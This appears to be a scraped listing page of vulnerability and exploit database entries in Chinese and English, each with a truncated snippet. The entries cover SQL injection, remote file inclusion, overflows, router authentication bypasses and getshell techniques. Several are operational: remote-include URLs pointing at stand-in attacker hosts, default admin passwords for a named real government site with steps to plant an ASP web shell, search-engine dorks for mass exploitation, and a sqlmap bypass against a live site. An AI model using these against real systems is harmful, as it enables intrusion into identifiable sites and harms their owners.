PHP Helpdesk Login SQL注入漏洞

PHP Helpdesk是一款基于PHP的WEB应用程序。 PHP Helpdesk不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击，可获得敏感信息或未授权访问应用程序。 问题是由于登录脚本对用户提交的参数缺少过滤，提交恶意SQL查询作为参数数据，可绕过验证未授权访问应用程序。 PHP Helpdesk 0.6.16 目前没有详细解决方案提供： http://phphelpdesk.sourceforge.net/...

Wordpress Multiple Versions Pwnpress Exploitation Tookit

No description provided by source. !/usr/bin/env ruby .---. .---. : : o : happy antiblogging, dear kids! ..-: 0 : :-.. / .-'' ' ---' ---' " -. Copyright c Lance M. Havok .' " ' " . " . ' " . lmh at info-pull.com : '.---.,,.,...,.,.,.,..---. ' ; . " . .' " .' ----- All rights reserved. &nbsp...

XOOPS Module icontent 1.0 Remote File Inclusion Exploit

No description provided by source. html head meta http-equiv="Content-Type" content="text/html; charset=windows-1254" titleXOOPS Module icontent v.1.0 Remote File Inclusion Exploit/title script language="JavaScript"...

MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

No description provided by source. html title MS07-027 mdsauth.dll NMSA Session Description Object SaveAs control, arbitrary file modification /title body OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa004254a0" /OBJECT script language="vbscript" //next script is converted to UTF16...

Joomla! PCLTar.PHP远程文件包含漏洞

Joomla!是一款基于PHP的WEB应用程序。 Joomla!不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'PCLTar.PHP'脚本对用户提交的'gpcltarlibdir'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Joomla 1.5.0 Beta 目前没有解决方案提供： http://www.joomla.org/ http://www.example.com/libraries/pcl/pcltar.php?gpcltarlibdir=http://hacker/?...

SunOS 5.10/5.11 TELNET服务远程绕过认证漏洞

SunOS是一款由Sun开发和维护的商业性质UNIX操作系统。 SunOS 5.10/5.11的TELNET服务在处理畸形的认证数据时存在漏洞，远程攻击者可能利用此漏洞绕过认证获得访问。 SunOS 5.10/5.11的Telnet守护进程未经检查将用户可能提交的畸形参数直接传递给login进程处理，login进程由此执行非预期的用户身份切换操作。这可能允许用户无需口令便可以某些特权用户权限登录到系统，获得完全的系统访问，如果系统未能对root用户登录位置作限制，获取root用户访问也是可能的。目前这个漏洞正在被积极的利用。 SunOS 5.11 SunOS 5.10 时解决方法：...

Texinfo File Handling Buffer Overflow Vulnerability

Texinfo is prone to a buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer. Exploiting this issue allows attackers to cause the affected applications using Texinfo to crash, denying...

PhpNews远程文件包含漏洞

PhpNews是一款基于PHP的新闻管理程序。 PhpNews不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于多个脚本对用户提交的'Include'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 PHPNews PHPNews 1.0 目前没有解决方案提供,请关注以下链接： http://newsphp.sourceforge.net/index.php http://www.example.com/Path/Include/lib.inc.php3?Include=http://cmd.gif?...

Mambatstaff MosConfig_Absolute_Path远程文件包含漏洞

Mambatstaff是一款基于Mambo的应用模块程序。 Mambatstaff不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'mambatstaff.php'脚本对用户提交的"mosConfigabsolutepath"参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 Mambo Mambatstaff Component http://mamboxchange.com/projects/mambatstaff/...

3CTftpSvc TFTP传送模式远程缓冲区溢出漏洞

3CTftpSvc TFTP是一款tftp服务程序。 3CTftpSvc TFTP不正确处理超长传送模式，远程攻击者可以利用漏洞进行缓冲区溢出攻击，可能以进程权限执行任意指令。 当处理超长传送模式超过470字节传递给"GET"或"PUT"命令，可导致发生缓冲区溢出，精心构建提交数据，可能以进程权限执行任意指令。 3CTftpSvc TFTP Server 2.0.1 http://support.3com.com/software/utilitiesforwindows32bit.htm !/usr/bin/python Buffer Overflow Long transporting...

AOL Instant Messenger AIM ""Away"" Message Remote Exploit

No description provided by source. / CAN-2004-0636 / / AIM Away Message Buffer Overflow Exploit Exploit by John Bissell A.K.A. HighT1mes Exploit: ======== drizzit.c Vulnerable Software: ==================== - AIM 5.5.3588 - AIM 5.5.3590 Beta - AIM 5.5.3591 - AIM 5.5.3595 and a couple others...

蓝海卓越计费管理系统任意文件下载

...

Apache OFBiz RCE漏洞（CVE-2021-26295）

...

DimonCoin(FUD), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018–11411)

Abstract I found a vulnerability of a smart contract for DimonCoinFUD, an Ethereum ERC20 token CVE-2018–114111. This vulnerability is exactly same with the UselessEthereumToken’s vulnerability2, 3. DimonCoin token also has the same vulnerable function which is transferFrom in UET token. Therefore...

TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass

Title: TP-Link Multiple RouterTL-WR840N and TL-WR841N Unauthenticated Router Access Vulnerability Author: BlackFog Team Date: 27 May 2018 Website: SecureLayer7.net Contact: [email protected] Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n Hardware: TL-WR841N v13 00000013 Version : Firmwar...

Telesquare SKT LTE Router SDT-CS3B1 WebDAV HTTP Methods Arbitrary File Events

Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. Description WebDAV is enabled with directory listing and dangerous HTTP methods allowed: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK and UNLOCK. The HTTP PUT metho...

Windows: Uninitialized variable in jscript!JsArraySlice(CVE-2017-11855)

There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors: - By opening a malicious web page in Internet Explorer. - currently untested An attacker on the local network could exploit this issue by posing as a WPAD Web Proxy...

MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling(CVE-2017-13867)

SOFLOWDIVERTTOKEN is a socket option on the SOLSOCKETlayer. It's implemented by flowdiverttokensetstruct socket so, struct sockopt sopt in flowdivert.c. The relevant code is: error = sooptgetmsopt, &token; if error goto done; error = sooptmcopyinsopt, token; if error goto done; ... done: if token...

ZTE ZXDSL Configuration Reset

Vulnerability Summary The following advisory describes a configuration reset vulnerability found in ZTE ZXDSL 831CII version 6.2. ZXDSL 831CII is “an ADSL access device to support multiple line modes. It supports ADSL2/ADSL2+ and is backward compatible to ADSL, even offers auto-negotiation...

DblTek Multiple Vulnerabilities

Vulnerabilities summary The following advisory describes 2 two vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...

wget HTTP integer overflow(CVE-2017-13089)

That’s an interesting vulnerability in GNU wget. According to the wget project, this was reported by Antti Levomäki, Christian Jalio, Joonas Pihlaja of Forcepoint as well as Juhani Eronen of the Finnish National Cyber Security Centre. The vulnerability is in src/http.c source code file and more...

Apple OS X Scene Kit DAE XML Code Execution Vulnerability(CVE-2016-1850)

SUMMARY An exploitable type confusion vulnerability exists in the handling of DAE images on OS X. A crafted DAE document can trigger a type confusion vulnerability which potentially could be exploited to achieve attacker controlled code execution. Vulnerability can be triggered via a saved DAE fi...

safari10跨域漏洞

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置httpheader 我交到苹果的bugreport，并给apple发邮件后，他们自己悄悄把漏洞修了，连个邮件都没给我发，所以我决定公开poc 这是我在漏洞未修复前截的图： 这个漏洞可以造成同源策略绕过，随便跨域，这是我写的获取gmail数据的代码： html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...

Lexmark LibISYSpdf Image Rendering DCTStream::getBlock() Code Execution Vulnerability(CVE-2017-2822)

Summary An exploitable code execution vulnerability exists in the image rendering functionality of Lexmark Perceptive Document Filters 11.3.0.2400. A specifically crafted PDF can cause a function call on a corrupted DCTStream to occur, resulting in user controlled data being written to the stack....

Microsoft Edge Security Bypass Vulnerability(CVE-2017-8637)

There is an issue in Chakra JIT server that can be potentially exploited to compromise the JIT process from a compromised browser content process. Bugs like this could potentially be used to bypass ACG Arbitrary Code Guard in Microsoft Edge. The issue has been confirmed on a ChakraCore build from...

Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)

Summary An exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configurati...

Windows Kernel stack memory disclosure in win32k!NtGdiMakeFontDir(CVE-2017-8477)

We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients. The attached proof of concept code which is specific to Windows 7 32-bit works by first filling a large portion of the kernel stack with a controlled...

Windows Kernel stack memory disclosure in win32k!ClientPrinterThunk(CVE-2017-8475)

We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 other platforms untested indirectly through the win32k!NtGdiOpenDCW system call. The analysis shown below was performed on Windows 7 32-bit. The full stack trace...

PlaySMs 1.4 'import.php' Remote Code Execution

Description Code Execution using import.php We know import.php accept file and just read content not stored in server. But when we stored payload in our backdoor.csv and upload to phonebook. Its execute our payload and show on next page in field in NAME,MOBILE,Email,Group COde,Tags accordingly . ...

KDE kauth and kdelibs Logic Flaw Lets Local Users Obtain Root Privileges(CVE-2017-8422)

This document describes a generic root exploit against kde. The exploit is achieved by abusing a logic flaw within the KAuth framework which is present in kde4 org.kde.auth and kde5 org.kde.kf5auth. It is possible to spoof what KAuth calls callerID's which are indeed D-Bus unique names of the...

Google Nexus 9 SensorHub Firmware Downgrade Vulnerability(CVE-2017-0582)

Product Google Nexus 9 Vulnerable Version Nexus 9 Android Builds before N4F27B - May 2017, i.e. before bootloader 3.50.0.0143. Mitigation Install N4F27B or later bootloader version 3.50.0.0143. Technical Details The Nexus 9 device contains a SoC manufactured by Cywee which implements a “Sensor...

Heap Overflow Vulnerability in Citrix NetScaler Gateway (CVE-2017-7219)

After presenting my findings on the Swisscom router at the CybSecConference last year, I started looking for a new product to analyze. I quickly found that it’s possible to download virtual “demo” appliances of Citrix products, so I went on to download a Netscaler VPX, which at the time was at...

Zabbix Proxy Server SQL Database Write Vulnerability (CVE-2017-2825)

Official patch earlier to fix the vulnerabilities: the Zabbix code execution vulnerability DETAILS One of the Trapper requests made by the Zabbix proxy is the ìproxy configî request, which allows a proxy to request its own proxy configuration from the Zabbix Server or any other Zabbix Proxyís...

Mozilla Firefox webkitdirectory local files disclosure (CVE-2017-5414)

I have reported three different bugs to Mozilla in the webkitdirectory feature. Luckily the folder picker was only implement in Mozilla's Nightly browser, which is meant to test out new features before landing in the stable version. Bug 1295914 - webkitdirectory could be used to trick users into...

AVTECH video surveillance equipment authentication bypass and other vulnerabilities

Authentication bypass vulnerability There are two ways to achieve authentication bypass: The first one is. cab way, the cab file format is a video player plug-in, stored in the web root directory, it may need to verify directly be accessed and downloaded, and the device end only through the strst...

万户ezOffice协同办公管理平台Voituregetsource.jsp svoitureid参数存在sql注入漏洞

No description provided by source...

TaoCMS v2.5Beta4 Comment.php 存在储存型xss漏洞(可打后台)

No description provided by source...

E-TILLER期刊采编系统/ch/reader/wait_published_articles.aspx等8处 POST注入漏洞

No description provided by source...

正方教务系统 jwggck.aspx 参数fbsj SQL注入漏洞

No description provided by source...

MetInfo 5.1.7 about/index.php 任意文件包含漏洞可getshell

No description provided by source...

泛微oa /iweboffice/officeserver.php 任意文件上传getshell

No description provided by source...

SDCMS大量网站存在弱口令#Getshell方法

简要描述： RT 详细说明： SDCMS大量网站存在弱口令 默认后台 admin/login.asp 弱口令 admin admin、admin admin888、sdcms sdcms、admin 123456 随便找了个政府站 http://www.qhxjcy.gov.cn/admin/ sdcms sdcms 进后台选择--界面 接着 模板管理----管理模板 选择 sdcmsindex.asp 并插入asp一句话 访问http://www.qhxjcy.gov.cn/index.asp img...

kindeditor<=4.1.5文件上传漏洞

漏洞描述漏洞存在于kindeditor编辑器里，你能上传.txt和.html文件，支持php/asp/jsp/asp.net漏洞存在于小于等于kindeditor4.1.5编辑器中关键字： allinurl:/examples/uploadbutton.html allinurl:/php/uploadjson.php / .asp /...

FE协作办公平台 /servlet/ChangeBGServlet 任意文件上传漏洞

漏洞文件：/servlet/ChangeBGServlet漏洞参数：skinName影响版本：FE5.5.2及以下版本代码片段： public void doGetHttpServletRequest request, HttpServletResponse response throws ServletException, IOException String savePath = getServletConfig.getServletContext.getRealPath""; String themeDir =...

施耐德(Schneider) Modicon PLC 数据包重放远程控制(Start/Stop Command)

施耐德Modicon系列PLC支持通过Unity Pro软件控制PLC，包括程序的上传下载、设备的启动关闭等管理员权限操作。该软件与PLC设备的通信无加密与身份认证，可进行数据包重放攻击。抓包分析：远程关闭设备：说明：该攻击通过以下POC实现较为容易，攻击能使得远程PLC直接停止运行，可能会对目标所在工业运行环境造成严重后果。可以通过pocsuite去验证漏洞存在，验证模式不会对设备造成影响，建议不要轻易尝试攻击。切记。...

JEECMS一处通用越权第四弹(可删除订单取消订单)

简要描述： 111 详细说明： ID1和ID2各自去买一个自己喜欢的东西，就是没有TT，真可惜啊-。- 我们修改一下ID，然后把自己吓一跳吧，。。 我们这些做测试的简直可以上星光大道了，引用刘谦那句话，接下来就是见证奇迹的时候了 白帽子都是魔术师-。- test7取消订单，然后会增加一个删除按钮，然后删除抓包改ID，发包，删除成功 漏洞证明： ID1和ID2各自去买一个自己喜欢的东西，就是没有TT，真可惜啊-。- 我们修改一下ID，然后把自己吓一跳吧，。。 我们这些做测试的简直可以上星光大道了，引用刘谦那句话，接下来就是见证奇迹的时候了 白帽子都是魔术师-。-...

Coremail官网SQL注入可读全库

简要描述： coremail官网存在注入，有防护，可绕过。 详细说明： 漏洞地址：http://www.coremail.cn/gjzc2/list117.aspx?lcid=412 漏洞证明： 有防护，直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。 这个是sqlmap用的payload： Place: GET Parameter: lcid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lcid=412 AND...

phpems设置缺陷直接添加管理员导致getshell

简要描述： phpems 默认uckey是1234567890 导致可以用uc的加密函数加密恶意代码带到sql语句中。 详细说明： if!defined'INUC' errorreporting0; setmagicquotesruntime0; defined'MAGICQUOTESGPC' || define'MAGICQUOTESGPC', getmagicquotesgpc; requireonce 'config.inc.php'; $DCACHE = $get = $post = array; $code = @$GET'code'; //code=加密代码...

Enalean Tuleap 7.2 - XXE File Disclosure

No description provided by source. Vulnerability title: Tuleap = 7.2 External XML Entity Injection in Enalean Tuleap CVE: CVE-2014-7177 Vendor: Enalean Product: Tuleap Affected version: 7.2 and earlier Fixed version: 7.4.99.5 Reported by: Jerzy Kramarz Details: A multiple XML External Entity...

新云cms建站系统存在ewebeditor上传和iis解析漏洞可批量getshell

简要描述： 详细说明： 新云cms建站系统存在ewebeditor上传和iis解析漏洞，可批量getshell. 利用ewebeditor上传漏洞可以新建一个1.asp的文件夹，再配合iis的解析漏洞就可以成功的拿到shell. 可通过谷歌获得大量的漏洞网站，关键字如下： inurl:Showservices.asp?id= inurl:showkbxx.asp?id= None...